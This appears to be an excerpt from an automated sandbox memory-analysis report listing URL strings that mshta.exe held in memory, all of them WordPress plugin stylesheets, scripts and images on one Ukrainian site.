Source: mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7_Jh
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7oJ
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.7
Source: mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.000001840776B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tra
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7#
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.73.
Source: mshta.exe, 00000003.00000002.2954352575.00000184079F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7C:
Source: mshta.exe, 00000003.00000002.2953230766.0000018407710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7b
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.70
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.72
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.76
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.77-trac
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7C:
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7O
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7f
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7js=
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7onte
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7x
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2.3
Source: mshta.exe, 00000003.00000002.2953230766.000001840776B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8-pro
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8:
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8C
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8C:
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8K
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2.css
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2C:
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2y
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.21.3.
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2C:
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2F
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2i
Source: mshta.exe, 00000003.00000002.2953230766.0000018407788000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823768527.000001840779C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2tx
Source: mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_author/js/by_author.js?ve
Source: mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.cs
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/js/by_instock.js?
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.cs
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/js/by_onsales.js?
Source: mshta.exe, 00000003.00000002.2953889531.0000018407932000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/
Source: mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/css/front.css
Source: mshta.exe, 00000003.00000002.2953889531.0000018407932000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953473804.0000018407839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/img/ajax-load
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/front.js?v
Source: mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/husky.js?v
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/front_builder/css/front-buil
Source: mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.c
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/label/js/html_types/label.js
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/quick_search/css/quick_searc
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/sections/css/sections.css?ve
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/sections/js/sections.js?ver=
Source: mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/js/html_t
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/css/jquery.tabSlide
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/css/slideout.css?ve
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/js/jquery.tabSlideO
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/js/slideout.js?ver=
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/
Source: mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/front.css
Source: mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.c
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/js/front.js?v
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png)
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png);background-size:
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png)g
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/minus.svg
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/plus.svg
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.jquery.js?ver=1
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=1.3
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/front.js?ver=1.3.4.2
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/checkbox.js?ver=1.
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/mselect.js?ver=1.3
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=1.3.4
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=1.3.
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/css/ion.rang
